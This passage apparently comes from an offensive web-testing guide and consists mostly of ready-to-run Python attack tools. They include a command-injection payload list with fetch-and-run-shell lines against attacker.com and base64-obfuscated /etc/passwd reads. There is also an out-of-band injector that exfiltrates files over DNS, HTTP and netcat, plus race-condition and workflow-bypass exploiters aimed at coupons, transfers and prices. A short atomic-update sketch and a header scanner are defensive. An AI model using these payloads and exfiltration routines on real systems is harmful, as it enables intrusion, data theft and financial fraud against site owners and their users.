            'basic': [
                ';id',
                '|id',
                '&id',
                '&&id',
                '||id',
                '`id`',
                '$(id)',
                '\nid',  # newline as a command separator
            ],
            
            'whitespace_variations': [
                'id',          # baseline
                'i\\d',        # backslash-escaped character
                'i\\\td',      # escaped tab inside the word
                'i\\\nd',      # escaped newline inside the word
                '{i,d}',       # brace expansion
                'i$@d',        # empty positional-parameter expansion
                'i$()d',       # empty command substitution
                'i${IFS}d',    # IFS expansion
            ],
            
            'encoding': [
                # URL encoding
                '%3bid',
                '%7cid',
                '%26id',
                '%60id%60',
                '%24%28id%29',
                
                # Double URL encoding
                '%253bid',
                '%257cid',
                
                # Hex encoding
                '\\x3bid',
                '\\x7cid',
                
                # Octal encoding
                '\\073id',
                '\\174id',
                
                # Unicode encoding
                '%u003bid',
                '%u007cid',
            ],
            
            'case_variation': [
                'Id',
                'iD',
                'ID',
            ],
            
            'command_concatenation': [
                'i""d',      # empty double quotes inside the word
                "i''d",      # empty single quotes inside the word
                'i$@d',      # empty parameter expansion
            ],
            
            'environment_variables': [
                '${PATH:0:1}id',
                '${LS_COLORS:10:1}id',
                '${PWD:0:1}id',
            ],
            
            'advanced_chaining': [
                '; id; #',
                '| id |',
                '& id &',
                '&& id &&',
                '|| id ||',
                '`id` #',
                '$(id) #',
                '){ id; }',
                '; id && echo vulnerable',
                '| id | grep -i root',
                '& cat /etc/passwd &',
                '; ping -c 1 attacker.com;',
                '; curl attacker.com/shell.sh | bash;',
                '; wget attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh;',
            ],
            
            'blind_injection': [
                '; sleep 5;',
                '| sleep 5 |',
                '& sleep 5 &',
                '`sleep 5`',
                '$(sleep 5)',
                '; ping -c 5 127.0.0.1;',
                '; cat /dev/zero | head -c 1000000;',
            ],
            
            'filter_bypass': [
                # Bypass "cat" filter
                'c\\at',
                'c""at',
                'c\'\'at',
                'c$@at',
                'c${IFS}at',
                'ca\t',
                'c\\a\\t',
                '/???/??t',  # /bin/cat
                '/?in/?at',
                
                # Bypass space filter
                'cat${IFS}/etc/passwd',
                'cat</etc/passwd',
                'cat<>/etc/passwd',
                '{cat,/etc/passwd}',
                'cat$@/etc/passwd',
                "X=$'\\x20'&&cat$X/etc/passwd",  # ANSI-C quoting to synthesize a space
                
                # Bypass slash filter
                'cat ${HOME:0:1}etc${HOME:0:1}passwd',  # first char of $HOME is "/"
                'cat etc/passwd',  # Relative path
                'cat .//etc//passwd',
                'cat /???/??????',  # /etc/passwd via wildcards
                
                # Bypass keyword filters with encoding
                '$(echo${IFS}Y2F0IC9ldGMvcGFzc3dkCg==|base64${IFS}-d|bash)',
                '`echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d`',
            ]
        }
    
    def test_all_payloads(self, base_value='127.0.0.1'):
        """Test all payload categories"""
        results = {}
        
        for category, payload_list in self.payloads.items():
            print(f"[*] Testing {category} payloads")
            category_results = []
            
            for payload in payload_list:
                # Construct the injection
                if base_value:
                    injection = f"{base_value}{payload}"
                else:
                    injection = payload
                
                # Test the injection
                result = self.test_payload(injection)
                
                if result['indicators']['injection_detected']:
                    category_results.append({
                        'payload': payload,
                        'response_time': result['response_time'],
                        'status_code': result['status_code'],
                        'indicators': result['indicators']['detected_indicators']
                    })
            
            results[category] = category_results
        
        return results
    
    def test_payload(self, injection):
        """Test a single payload"""
        # requests URL-encodes query parameters itself, so the raw
        # injection string can be passed straight through
        params = {self.vulnerable_param: injection}
        
        # Measure response time for blind injection detection
        start_time = time.time()
        
        try:
            response = self.session.get(
                self.target_url,
                params=params,
                timeout=10
            )
            response_time = time.time() - start_time
            
            # Analyze response for injection indicators
            indicators = self.analyze_response(response, response_time)
            
            return {
                'payload': injection,
                'status_code': response.status_code,
                'response_time': response_time,
                'response_length': len(response.text),
                'response_text': response.text[:1000],  # preview for reporting
                'indicators': indicators
            }
        
        except requests.exceptions.Timeout:
            return {
                'payload': injection,
                'status_code': 'TIMEOUT',
                'response_time': 10,
                'indicators': {'injection_detected': True, 'timeout': True}
            }
    
    def analyze_response(self, response, response_time):
        """Analyze response for command injection indicators"""
        indicators = {
            'injection_detected': False,
            'detected_indicators': []
        }
        
        response_text = response.text.lower()
        
        # Check for command output in response
        command_output_indicators = [
            'root:x:0:0',
            'uid=',
            'gid=',
            'groups=',
            'bin/bash',
            '/home/',
            'www-data',
            'daemon',
            'nobody',
            'Linux',
            'Unix',
            'kernel',
            'total ',
            'drwx',
            '-rw-',
            'ls: cannot access',
            'command not found',
            'Permission denied',
            'No such file or directory'
        ]
        
        for indicator in command_output_indicators:
            if indicator in response_text:
                indicators['detected_indicators'].append(indicator)
                indicators['injection_detected'] = True
        
        # Check for time-based indicators
        if response_time > 4.5:  # For sleep 5 payloads
            indicators['detected_indicators'].append(f'Time delay: {response_time}s')
            indicators['injection_detected'] = True
        
        # Check for error messages that indicate command execution
        error_indicators = [
            'sh:',
            'bash:',
            'dash:',
            'ksh:',
            'zsh:',
            '/bin/sh:',
            '/bin/bash:'
        ]
        
        for error in error_indicators:
            if error in response_text:
                indicators['detected_indicators'].append(error)
                indicators['injection_detected'] = True
        
        return indicators
    
    def automated_exploitation(self, command):
        """Automatically exploit command injection"""
        # Find a working payload first
        working_payloads = []
        
        for category, payload_list in self.payloads.items():
            for payload in payload_list[:5]:  # Test first 5 from each category
                test_result = self.test_payload(f"127.0.0.1{payload}")
                if test_result['indicators']['injection_detected']:
                    working_payloads.append(payload)
                    break
        
        if not working_payloads:
            return {"error": "No working payload found"}
        
        # Use first working payload to execute command
        working_payload = working_payloads[0]
        
        # Encode command if needed (for filters)
        encoded_commands = [
            command,
            f"echo {command} | bash",
            f"echo {command} | sh",
            f"{command} 2>&1",
            f"$(echo {command})"
        ]
        
        results = []
        for cmd in encoded_commands:
            injection = f"127.0.0.1{working_payload.replace('id', cmd)}"
            result = self.test_payload(injection)
            
            if result['indicators']['injection_detected']:
                results.append({
                    'command': cmd,
                    'success': True,
                    'response_preview': result.get('response_text', '')[:500]
                })
            else:
                results.append({
                    'command': cmd,
                    'success': False
                })
        
        return results

# Usage
injector = CommandInjector("http://target.com/ping", "ip")
results = injector.test_all_payloads()

for category, payloads in results.items():
    if payloads:
        print(f"\n[!] {category} - {len(payloads)} successful payloads")
        for p in payloads[:3]:  # Show first 3
            print(f"  - {p['payload']} ({p['response_time']:.2f}s)")

Out-of-Band Command Injection

#!/usr/bin/env python3
"""
Out-of-Band (OOB) Command Injection Detection
Uses DNS, HTTP, and other protocols to confirm injection
"""
import requests
import time
import threading

class OOBCommandInjector:
    def __init__(self, target_url, param_name, collaborator_url=None):
        self.target_url = target_url
        self.param_name = param_name
        self.collaborator = collaborator_url or self.setup_interactsh()
        self.session = requests.Session()
        
        # OOB payloads for different protocols
        self.oob_payloads = {
            'dns': [
                # DNS lookup
                '; nslookup $(whoami).{collaborator}',
                '| nslookup $(id).{collaborator}',
                '`nslookup $(hostname).{collaborator}`',
                
                # Dig
                '; dig $(cat /etc/passwd | base64).{collaborator}',
                '| dig $(uname -a | base64).{collaborator}',
                
                # Ping with DNS
                '; ping -c 1 $(whoami).{collaborator}',
            ],
            
            'http': [
                # Curl/wget
                '; curl http://{collaborator}/$(whoami)',
                '| wget http://{collaborator}/$(id)',
                '`curl http://{collaborator}/$(hostname)`',
                
                # With data exfiltration
                '; curl -X POST http://{collaborator} -d "$(cat /etc/passwd | base64)"',
                '| wget --post-data="$(uname -a)" http://{collaborator}',
                
                # Using netcat
                '; cat /etc/passwd | base64 | nc {collaborator} 80',
            ],
            
            'icmp': [
                # Ping with data in size
                '; ping -c 1 -s $(expr $(whoami | wc -c) + 8) {collaborator}',
                '| ping -c 1 -p $(printf "%x" $(id | sum | cut -f1 -d" ")) {collaborator}',
            ],
            
            'nslookup_python': [
                # Python one-liners
                '; python3 -c "import os; import socket; socket.gethostbyname(os.popen(\'whoami\').read().strip() + \'.{collaborator}\')"',
                '| python3 -c "import os, urllib.request, urllib.parse; urllib.request.urlopen(\'http://{collaborator}/\' + urllib.parse.quote(os.popen(\'id\').read()))"',
            ],
            
            'blind_with_delay': [
                # Time-based with DNS (will cause delay on DNS resolution failure)
                '; ping -c 1 $(whoami).{collaborator} || sleep 5',
                '| nslookup $(id).{collaborator} || sleep 5',
            ]
        }
    
    def setup_interactsh(self):
        """Set up InteractSH server for OOB testing"""
        try:
            # Start InteractSH client
            import tempfile
            import os
            
            # Create temporary directory for InteractSH
            temp_dir = tempfile.mkdtemp()
            client_path = os.path.join(temp_dir, 'interactsh-client')
            
            # Download interactsh-client if not exists
            # Note: In real use, you would have this pre-installed
            print("[*] Note: Install interactsh-client from https://github.com/projectdiscovery/interactsh")
            
            # For demo, we'll use a placeholder
            return "your-subdomain.interact.sh"
            
        except Exception as e:
            print(f"[-] InteractSH setup failed: {e}")
            return "attacker-controlled-domain.com"
    
    def monitor_interactions(self, duration=60):
        """Monitor for interactions with collaborator"""
        interactions = []
        
        # In real implementation, you would:
        # 1. Start InteractSH client
        # 2. Monitor for DNS/HTTP interactions
        # 3. Parse incoming data
        
        print(f"[*] Monitoring for interactions for {duration} seconds...")
        print("[*] In real scenario, this would connect to InteractSH server")
        
        # Simulated monitoring
        time.sleep(duration)
        
        # Return simulated interactions for demo
        simulated_interactions = [
            {
                'type': 'dns',
                'timestamp': time.time(),
                'data': 'root.d3b4a1c2.interact.sh',
                'protocol': 'DNS'
            },
            {
                'type': 'http',
                'timestamp': time.time() + 5,
                'data': 'GET /root HTTP/1.1',
                'protocol': 'HTTP'
            }
        ]
        
        return simulated_interactions
    
    def test_oob_injection(self):
        """Test for OOB command injection"""
        results = []
        
        # Start monitoring in the background; collect the thread's result in
        # a shared list, since a Thread's return value is otherwise discarded
        interactions = []
        monitor_thread = threading.Thread(
            target=lambda: interactions.extend(self.monitor_interactions(120))
        )
        monitor_thread.start()
        
        # Send payloads
        for protocol, payload_list in self.oob_payloads.items():
            print(f"[*] Testing {protocol} OOB payloads")
            
            for payload_template in payload_list[:3]:  # Test first 3
                payload = payload_template.format(collaborator=self.collaborator)
                
                # Send request
                params = {self.param_name: payload}
                
                try:
                    response = self.session.get(
                        self.target_url,
                        params=params,
                        timeout=10
                    )
                    
                    results.append({
                        'protocol': protocol,
                        'payload': payload[:100],
                        'status_code': response.status_code,
                        'response_time': response.elapsed.total_seconds()
                    })
                    
                    print(f"  [+] Sent {protocol} payload: {payload[:50]}...")
                    
                except Exception as e:
                    results.append({
                        'protocol': protocol,
                        'payload': payload[:100],
                        'error': str(e)
                    })
                
                time.sleep(1)  # Rate limiting
        
        # Wait for monitoring to complete and use what it captured
        monitor_thread.join()
        
        return {
            'sent_payloads': results,
            'interactions': interactions,
            'oob_detected': len(interactions) > 0
        }
    
    def automated_data_exfiltration(self, file_path):
        """Automatically exfiltrate data using OOB"""
        # Generate payloads for data exfiltration
        exfiltration_methods = [
            # Base64 encoding via DNS
            f'; cat {file_path} | base64 | tr -d "\\n" | fold -w 63 | while read chunk; do nslookup $chunk.{{collaborator}}; done',
            
            # HTTP POST
            f'; curl -X POST http://{{collaborator}}/exfil -d "$(cat {file_path} | base64)"',
            
            # Using xxd for hex encoding
            f'; xxd -p {file_path} | tr -d "\\n" | fold -w 60 | while read chunk; do ping -c 1 $chunk.{{collaborator}}; done',
            
            # Python one-liner for large files
            f'; python3 -c "import urllib.request, base64; urllib.request.urlopen(\'http://{{collaborator}}/\' + base64.b64encode(open(\'{file_path}\', \'rb\').read()).decode())"',
        ]
        
        results = []
        
        for method in exfiltration_methods:
            payload = method.format(collaborator=self.collaborator)
            
            print(f"[*] Testing exfiltration: {payload[:80]}...")
            
            # Send payload
            params = {self.param_name: payload}
            
            try:
                response = self.session.get(
                    self.target_url,
                    params=params,
                    timeout=30
                )
                
                results.append({
                    'method': method[:50],
                    'status': 'sent',
                    'response_time': response.elapsed.total_seconds()
                })
                
            except Exception as e:
                results.append({
                    'method': method[:50],
                    'status': 'error',
                    'error': str(e)
                })
            
            time.sleep(2)
        
        # Monitor for incoming data
        print("[*] Monitoring for exfiltrated data...")
        time.sleep(30)
        
        # In real implementation, you would parse the received data
        # from your collaborator server
        
        return results

# Usage
oob_tester = OOBCommandInjector(
    "http://target.com/run",
    "cmd",
    collaborator="your-domain.interact.sh"
)

results = oob_tester.test_oob_injection()

if results['oob_detected']:
    print("[!] OOB Command Injection detected!")
    for interaction in results['interactions']:
        print(f"  [+] {interaction['protocol']}: {interaction['data']}")

Chapter 4: Insecure Design - Business Logic Flaws

4.1 Advanced Business Logic Testing

Race Condition Exploitation Framework

#!/usr/bin/env python3
"""
Advanced Race Condition Testing Framework
Tests for TOCTOU, limit bypass, and concurrency vulnerabilities
"""
import asyncio
import aiohttp
import json

class RaceConditionTester:
    def __init__(self, target_url, session_cookies=None):
        self.target_url = target_url
        self.cookies = session_cookies or {}
        self.results = []
        
    async def send_concurrent_requests(self, 
                                     request_template, 
                                     concurrency=10, 
                                     total_requests=100):
        """Send concurrent requests to test for race conditions"""
        async with aiohttp.ClientSession(cookies=self.cookies) as session:
            tasks = []
            
            for i in range(total_requests):
                # Modify request if needed (e.g., different IDs)
                request = self.modify_request(request_template, i)
                task = self.send_request(session, request)
                tasks.append(task)
            
            # Send in batches for concurrency control
            responses = []
            for i in range(0, len(tasks), concurrency):
                batch = tasks[i:i+concurrency]
                batch_responses = await asyncio.gather(*batch, return_exceptions=True)
                responses.extend(batch_responses)
                
                # Small delay between batches
                await asyncio.sleep(0.1)
            
            return responses
    
    async def send_request(self, session, request):
        """Send individual request"""
        try:
            async with session.request(
                method=request['method'],
                url=request['url'],
                headers=request.get('headers', {}),
                data=request.get('data'),
                json=request.get('json')
            ) as response:
                return {
                    'status': response.status,
                    'text': await response.text(),
                    'headers': dict(response.headers)
                }
        except Exception as e:
            return {'error': str(e)}
    
    def modify_request(self, template, index):
        """Modify request template for testing"""
        request = template.copy()
        
        # Modify based on index
        if 'data' in request:
            # For form data
            if isinstance(request['data'], dict):
                # Add sequence number to avoid duplicates
                request['data'] = request['data'].copy()
                for key in request['data']:
                    if 'UNIQUE' in str(request['data'][key]):
                        request['data'][key] = request['data'][key].replace('UNIQUE', str(index))
        
        elif 'json' in request:
            # For JSON data
            if isinstance(request['json'], dict):
                request['json'] = request['json'].copy()
                # Modify JSON values via a serialize/replace round-trip
                json_str = json.dumps(request['json'])
                if 'UNIQUE' in json_str:
                    json_str = json_str.replace('UNIQUE', str(index))
                    request['json'] = json.loads(json_str)
        
        return request
    
    async def test_coupon_race(self, coupon_code, concurrency=20):
        """Test for coupon code race condition"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/apply-coupon',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'coupon_code': coupon_code,
                'order_id': 'ORDER_UNIQUE'
            }
        }
        
        print(f"[*] Testing coupon code race: {coupon_code}")
        
        responses = await self.send_concurrent_requests(
            request_template, 
            concurrency=concurrency,
            total_requests=concurrency * 2
        )
        
        # Analyze responses
        success_count = 0
        error_count = 0
        
        for resp in responses:
            if isinstance(resp, dict):
                if resp.get('status') == 200:
                    success_count += 1
                else:
                    error_count += 1
        
        result = {
            'test': 'coupon_race',
            'coupon_code': coupon_code,
            'concurrency': concurrency,
            'success_count': success_count,
            'error_count': error_count,
            'vulnerable': success_count > 1  # Coupon used more than once
        }
        
        self.results.append(result)
        return result
    
    async def test_balance_transfer_race(self, from_account, to_account, amount, concurrency=15):
        """Test for balance transfer race condition"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/transfer',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'from_account': from_account,
                'to_account': to_account,
                'amount': amount,
                'reference': 'REF_UNIQUE'
            }
        }
        
        print(f"[*] Testing balance transfer race: {amount} from {from_account}")
        
        responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency
        )
        
        # Check for duplicate transfers
        successful_transfers = []
        
        for resp in responses:
            if isinstance(resp, dict) and resp.get('status') == 200:
                # Extract transfer ID from response
                try:
                    data = json.loads(resp.get('text', '{}'))
                    if 'transfer_id' in data:
                        successful_transfers.append(data['transfer_id'])
                except ValueError:
                    successful_transfers.append('unknown')
        
        result = {
            'test': 'balance_transfer_race',
            'from_account': from_account,
            'to_account': to_account,
            'amount': amount,
            'concurrency': concurrency,
            'successful_transfers': len(successful_transfers),
            'unique_transfers': len(set(successful_transfers)),
            'vulnerable': len(successful_transfers) > 1 and len(set(successful_transfers)) > 1
        }
        
        self.results.append(result)
        return result
    
    async def test_inventory_race(self, product_id, quantity=1, concurrency=25):
        """Test for inventory race condition (TOCTOU)"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/purchase',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'product_id': product_id,
                'quantity': quantity,
                'customer_id': 'CUST_UNIQUE'
            }
        }
        
        print(f"[*] Testing inventory race for product: {product_id}")
        
        responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency * 2
        )
        
        # Analyze inventory oversell
        successful_purchases = []
        
        for resp in responses:
            if isinstance(resp, dict) and resp.get('status') == 200:
                successful_purchases.append(1)
        
        result = {
            'test': 'inventory_race',
            'product_id': product_id,
            'quantity': quantity,
            'concurrency': concurrency,
            'successful_purchases': len(successful_purchases),
            # Heuristic: ideally compare against the product's known stock;
            # absent that, flag when implausibly many purchases succeed
            'vulnerable': len(successful_purchases) > 10
        }
        
        self.results.append(result)
        return result
    
    async def test_rate_limit_bypass(self, endpoint, concurrency=50):
        """Test for rate limit bypass via race condition"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}{endpoint}',
            'headers': {'Content-Type': 'application/json'},
            'json': {'action': 'test_UNIQUE'}
        }
        
        print(f"[*] Testing rate limit bypass: {endpoint}")
        
        # First, determine normal rate limit
        baseline_responses = await self.send_concurrent_requests(
            request_template,
            concurrency=1,
            total_requests=5
        )
        
        # Then test with high concurrency
        attack_responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency
        )
        
        # Count successful responses
        baseline_success = sum(1 for r in baseline_responses 
                             if isinstance(r, dict) and r.get('status') == 200)
        
        attack_success = sum(1 for r in attack_responses 
                           if isinstance(r, dict) and r.get('status') == 200)
        
        result = {
            'test': 'rate_limit_bypass',
            'endpoint': endpoint,
            'concurrency': concurrency,
            'baseline_success': baseline_success,
            'attack_success': attack_success,
            'vulnerable': attack_success > baseline_success * 2
        }
        
        self.results.append(result)
        return result
    
    async def run_all_tests(self):
        """Run all race condition tests"""
        tests = [
            self.test_coupon_race("WELCOME2024", 20),
            self.test_balance_transfer_race("ACC123", "ACC456", 100, 15),
            self.test_inventory_race("PROD789", 1, 25),
            self.test_rate_limit_bypass("/api/reset-password", 50)
        ]
        
        results = await asyncio.gather(*tests)
        
        # Generate report
        report = {
            'summary': {
                'total_tests': len(results),
                'vulnerable_tests': sum(1 for r in results if r.get('vulnerable')),
                'tests_run': [r.get('test') for r in results]
            },
            'detailed_results': results
        }
        
        return report

# Usage
async def main():
    tester = RaceConditionTester(
        "http://target.com",
        session_cookies={"SESSION": "your_session_id"}
    )
    
    report = await tester.run_all_tests()
    
    print("\n" + "="*60)
    print("RACE CONDITION TEST REPORT")
    print("="*60)
    
    for result in report['detailed_results']:
        status = "VULNERABLE" if result.get('vulnerable') else "SAFE"
        print(f"\n[{status}] {result['test']}")
        print(f"  Details: {result}")

# Run the test (asyncio is already imported at the top of the script)
asyncio.run(main())
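
What the inventory and coupon tests above exploit is a check-then-act window on the server. The sketch below (SQLite for illustration; the schema is hypothetical) contrasts the racy read-then-write with a single conditional UPDATE that closes the window:

import sqlite3

db = sqlite3.connect("shop.db")

def purchase_racy(product_id):
    # BUG: stock is read, then decremented in a separate statement; two
    # concurrent requests can both observe stock == 1 and both succeed
    (stock,) = db.execute("SELECT stock FROM inventory WHERE id = ?",
                          (product_id,)).fetchone()
    if stock > 0:
        db.execute("UPDATE inventory SET stock = stock - 1 WHERE id = ?",
                   (product_id,))
        db.commit()
        return True
    return False

def purchase_atomic(product_id):
    # Check and decrement happen in one statement, so the database
    # serializes them and overselling becomes impossible
    cur = db.execute("UPDATE inventory SET stock = stock - 1 "
                     "WHERE id = ? AND stock > 0", (product_id,))
    db.commit()
    return cur.rowcount == 1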

Workflow Bypass Detection

#!/usr/bin/env python3
"""
Workflow Bypass and State Transition Testing
Tests for skipped steps, unauthorized state changes, and business logic flaws
"""
import requests
import json
from urllib.parse import urljoin

class WorkflowBypassTester:
    def __init__(self, base_url, auth_token=None):
        self.base_url = base_url
        self.session = requests.Session()
        if auth_token:
            self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
        
        # Common workflow patterns to test
        self.workflow_patterns = {
            'checkout': ['cart', 'shipping', 'payment', 'confirmation'],
            'registration': ['start', 'verify_email', 'set_password', 'complete'],
            'password_reset': ['request', 'verify_token', 'set_new', 'complete'],
            'kyc': ['personal_info', 'document_upload', 'verification', 'approved']
        }
    
    def test_step_skipping(self, workflow_type, steps=None):
        """Test if workflow steps can be skipped"""
        vulnerabilities = []
        
        # Discover step endpoints, falling back to any caller-supplied list
        step_endpoints = self.discover_workflow_endpoints(workflow_type) or steps or []
        
        if not step_endpoints:
            print(f"[-] Could not discover endpoints for {workflow_type}")
            return vulnerabilities
        
        # Test skipping from first to last step
        if len(step_endpoints) >= 3:
            first_step = step_endpoints[0]
            last_step = step_endpoints[-1]
            
            print(f"[*] Testing step skipping: {first_step} -> {last_step}")
            
            # Try to access last step without completing first
            response = self.session.get(urljoin(self.base_url, last_step))
            
            if response.status_code == 200:
                # Check if it actually worked (not just showing error page)
                if not self.is_error_page(response.text):
                    vulnerabilities.append({
                        'type': 'step_skipping',
                        'workflow': workflow_type,
                        'from_step': first_step,
                        'to_step': last_step,
                        'status_code': response.status_code,
                        'evidence': response.text[:200]
                    })
        
        # Test skipping intermediate steps
        for i in range(len(step_endpoints) - 2):
            for j in range(i + 2, len(step_endpoints)):
                step_a = step_endpoints[i]
                step_b = step_endpoints[j]
                
                # Complete step A
                self.complete_step(step_a)
                
                # Try to access step B directly
                response = self.session.get(urljoin(self.base_url, step_b))
                
                if response.status_code == 200 and not self.is_error_page(response.text):
                    vulnerabilities.append({
                        'type': 'intermediate_step_skip',
                        'workflow': workflow_type,
                        'skipped_steps': step_endpoints[i+1:j],
                        'status_code': response.status_code
                    })
        
        return vulnerabilities
    
    def test_state_manipulation(self, workflow_type):
        """Test if workflow state can be manipulated"""
        vulnerabilities = []
        
        # Discover state parameters
        state_params = self.discover_state_parameters(workflow_type)
        
        for param, values in state_params.items():
            # Try to set unauthorized states
            for target_state in ['approved', 'completed', 'verified', 'paid']:
                if target_state not in values:  # Not a normal state
                    # Try to set this state
                    payload = {param: target_state}
                    
                    response = self.session.post(
                        urljoin(self.base_url, f'/api/{workflow_type}/update'),
                        json=payload
                    )
                    
                    if response.status_code == 200:
                        # Verify state was actually changed
                        check_response = self.session.get(
                            urljoin(self.base_url, f'/api/{workflow_type}/status')
                        )
                        
                        if target_state in check_response.text:
                            vulnerabilities.append({
                                'type': 'state_manipulation',
                                'workflow': workflow_type,
                                'parameter': param,
                                'unauthorized_state': target_state,
                                'evidence': check_response.text[:200]
                            })
        
        return vulnerabilities
    
    def test_parallel_workflows(self):
        """Test for parallel workflow execution issues"""
        vulnerabilities = []
        
        workflows = ['checkout', 'kyc', 'registration']
        
        for workflow in workflows:
            # Start two instances of the same workflow
            instance1_id = self.start_workflow(workflow)
            instance2_id = self.start_workflow(workflow)
            
            if instance1_id and instance2_id:
                # Try to mix data between workflows
                mix_payload = {
                    'workflow_id': instance1_id,
                    'data': {'from_instance': instance2_id}
                }
                
                response = self.session.post(
                    urljoin(self.base_url, f'/api/{workflow}/update'),
                    json=mix_payload
                )
                
                if response.status_code == 200:
                    vulnerabilities.append({
                        'type': 'parallel_workflow_mixing',
                        'workflow': workflow,
                        'instance1': instance1_id,
                        'instance2': instance2_id,
                        'evidence': response.text[:200]
                    })
        
        return vulnerabilities
    
    def test_business_constraint_bypass(self):
        """Test for business constraint bypasses"""
        vulnerabilities = []
        
        # Test 1: Negative quantities
        test_cases = [
            {'item': 'PROD001', 'quantity': -1, 'expected': 'error'},
            {'item': 'PROD001', 'quantity': 0, 'expected': 'error'},
            {'item': 'PROD001', 'quantity': 999999, 'expected': 'error'},  # Too large
            {'item': 'PROD001', 'quantity': 1.5, 'expected': 'error'},  # Fractional
        ]
        
        for test in test_cases:
            response = self.session.post(
                urljoin(self.base_url, '/api/cart/add'),
                json=test
            )
            
            if response.status_code == 200 and test['expected'] == 'error':
                vulnerabilities.append({
                    'type': 'quantity_constraint_bypass',
                    'test_case': test,
                    'status_code': response.status_code,
                    'response': response.text[:200]
                })
        
        # Test 2: Price manipulation
        price_tests = [
            {'item': 'PROD001', 'price': 0.01},  # Lower than actual
            {'item': 'PROD001', 'price': -10},   # Negative price
            {'item': 'PROD001', 'price': 1e10},  # Very high price
        ]
        
        for test in price_tests:
            response = self.session.post(
                urljoin(self.base_url, '/api/checkout'),
                json=test
            )
            
            if response.status_code == 200:
                # Check if order was created with manipulated price
                order_response = self.session.get(
                    urljoin(self.base_url, '/api/orders/latest')
                )
                
                if str(test['price']) in order_response.text:
                    vulnerabilities.append({
                        'type': 'price_manipulation',
                        'test_case': test,
                        'order_details': order_response.text[:200]
                    })
        
        # Test 3: Discount stacking
        discount_tests = [
            {'coupons': ['SAVE10', 'SAVE20', 'SAVE30']},  # Multiple coupons
            {'coupons': ['SAVE10'] * 5},  # Same coupon multiple times
        ]
        
        for test in discount_tests:
            for coupon in test['coupons']:
                self.session.post(
                    urljoin(self.base_url, '/api/apply-coupon'),
                    json={'coupon': coupon}
                )
            
            # Check final price
            response = self.session.get(
                urljoin(self.base_url, '/api/cart/total')
            )
            
            try:
                total = response.json().get('total', 0)
                if total < 0:  # Negative total means discounts stacked past 100%
                    vulnerabilities.append({
                        'type': 'discount_stacking',
                        'coupons': test['coupons'],
                        'final_total': total
                    })
            except ValueError:
                pass
        
        return vulnerabilities
    
    def discover_workflow_endpoints(self, workflow_type):
        """Discover endpoints for a given workflow"""
        endpoints = []
        
        # Common endpoint patterns
        patterns = [
            f'/api/{workflow_type}/{{step}}',
            f'/{workflow_type}/{{step}}',
            f'/app/{workflow_type}/{{step}}',
        ]
        
        # Common step names
        step_names = ['start', 'create', 'step1', 'step2', 'step3', 
                     'review', 'confirm', 'complete', 'finish']
        
        for pattern in patterns:
            for step in step_names:
                endpoint = pattern.format(step=step)
                response = self.session.head(urljoin(self.base_url, endpoint))
                
                if response.status_code != 404:
                    endpoints.append(endpoint)
        
        return sorted(set(endpoints))
    
    def is_error_page(self, html):
        """Check if page is an error page"""
        error_indicators = [
            'error', 'invalid', 'not found', '404', '403',
            'forbidden', 'unauthorized', 'access denied'
        ]
        
        html_lower = html.lower()
        return any(indicator in html_lower for indicator in error_indicators)

# Usage
tester = WorkflowBypassTester(
    "http://target.com",
    auth_token="your_auth_token"
)

# Run tests
checkout_steps = tester.discover_workflow_endpoints('checkout')
step_skip_vulns = tester.test_step_skipping('checkout', checkout_steps)
state_vulns = tester.test_state_manipulation('kyc')
parallel_vulns = tester.test_parallel_workflows()
constraint_vulns = tester.test_business_constraint_bypass()

all_vulns = step_skip_vulns + state_vulns + parallel_vulns + constraint_vulns

print(f"\n[+] Found {len(all_vulns)} workflow bypass vulnerabilities:")
for vuln in all_vulns:
    print(f"  - {vuln['type']}: {vuln.get('evidence', 'No details')[:100]}")

Chapter 5: Security Misconfiguration - Beyond Default Configs

5.1 Comprehensive Configuration Scanning

Automated Misconfiguration Detection Framework

#!/usr/bin/env python3
"""
Advanced Security Misconfiguration Scanner
Covers web servers, application frameworks, cloud services, and containers
"""
import requests
import json
import re
import time
from typing import Dict, List
import concurrent.futures

class SecurityMisconfigScanner:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'SecurityScanner/1.0'
        })
        self.findings = []
    
    def scan_web_server(self):
        """Scan web server configurations"""
        server_findings = []
        
        # 1. Check for risky HTTP methods (safe methods such as GET/POST are expected)
        risky_methods = ['PUT', 'DELETE', 'PATCH', 'TRACE', 'CONNECT']
        for method in risky_methods:
            try:
                response = self.session.request(method, self.target_url, timeout=5)
                if response.status_code not in [405, 501]:  # Method not rejected
                    server_findings.append({
                        'category': 'HTTP Methods',
                        'issue': f'Potentially dangerous method {method} enabled',
                        'severity': 'MEDIUM',
                        'evidence': f'HTTP {method} returns {response.status_code}'
                    })
            except requests.RequestException:
                pass
        
        # 2. Check HTTP headers
        response = self.session.get(self.target_url)
        headers = response.headers
        
        # Security headers check
        security_headers = {
            'Strict-Transport-Security': 'HIGH',
            'Content-Security-Policy': 'MEDIUM',
            'X-Frame-Options': 'MEDIUM',
            'X-Content-Type-Options': 'LOW',
            'Referrer-Policy': 'LOW',
            'Permissions-Policy': 'MEDIUM'
        }
        
        for header, severity in security_headers.items():
            if header not in headers:
                server_findings.append({
                    'category': 'Security Headers',
                    'issue': f'Missing security header: {header}',
                    'severity': severity,
                    'evidence': 'Header not present in response'
                })
        
        # 3. Check for server information leakage
        server_header = headers.get('Server', '')
        x_powered_by = headers.get('X-Powered-By', '')
        
        if server_header:
            server_findings.append({
                'category': 'Information Disclosure',
                'issue': f'Server version disclosed: {server_header}',
                'severity': 'LOW',
                'evidence': f'Server: {server_header}'
            })
        
        if x_powered_by:
            server_findings.append({
                'category': 'Information Disclosure',
                'issue': f'Technology stack disclosed: {x_powered_by}',
                'severity': 'LOW',
                'evidence': f'X-Powered-By: {x_powered_by}'
            })
        
        # 4. Check for directory listing
